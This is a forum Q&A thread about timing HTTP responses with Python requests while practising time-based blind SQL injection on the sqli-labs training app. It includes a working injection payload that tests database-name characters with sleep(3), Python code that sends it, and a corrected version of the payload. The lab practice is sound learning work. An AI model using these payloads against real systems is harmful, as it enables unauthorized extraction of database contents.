Measuring HTTP response time using the Python requests library. Am I doing it right?

I am trying to artificially delay the HTTP response from a web application (this is the technique used for time-based blind SQL injection). When the following HTTP request is sent from the browser, the web server returns the response after 3 seconds (triggered by sleep(3)):

http://192.168.2.15/sqli-labs/Less-9/?id=1'+and+if+(ascii(substr(database(),+1,+1))=115,sleep(3),null)+--+

      

I am trying to do the same in Python 2.7 using the requests library. The code I have is:

import requests

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = r.elapsed.total_seconds()
print roundtrip

      

I expected the round trip to be about 3 seconds, but instead I get values such as 0.001371, 0.001616, and 0.002228. Am I using the elapsed attribute incorrectly?





2 answers


elapsed measures the time between sending the request and finishing parsing the response headers; it does not include the time it takes to download the complete response body.
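A quick way to see the distinction (just a sketch, assuming the same test URL is reachable) is to stream the response so the body download is timed separately:

import requests
import time

# Sketch only: with stream=True the call returns as soon as the headers are
# parsed, so r.elapsed excludes the time spent downloading the body.
start = time.time()
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', stream=True)
print r.elapsed.total_seconds()   # time up to the response headers
_ = r.content                     # force the body to be downloaded
print time.time() - start         # full round trip including the body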

If you want to measure the full round trip, you must measure it yourself:



import requests
import time

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
start = time.time()
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = time.time() - start
print roundtrip

      





I realized that my payload should be:

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) -- "}



The last "+" character in the original payload is passed to the backend database, resulting in invalid SQL syntax. I shouldn't have done any hand-coding in the payload.









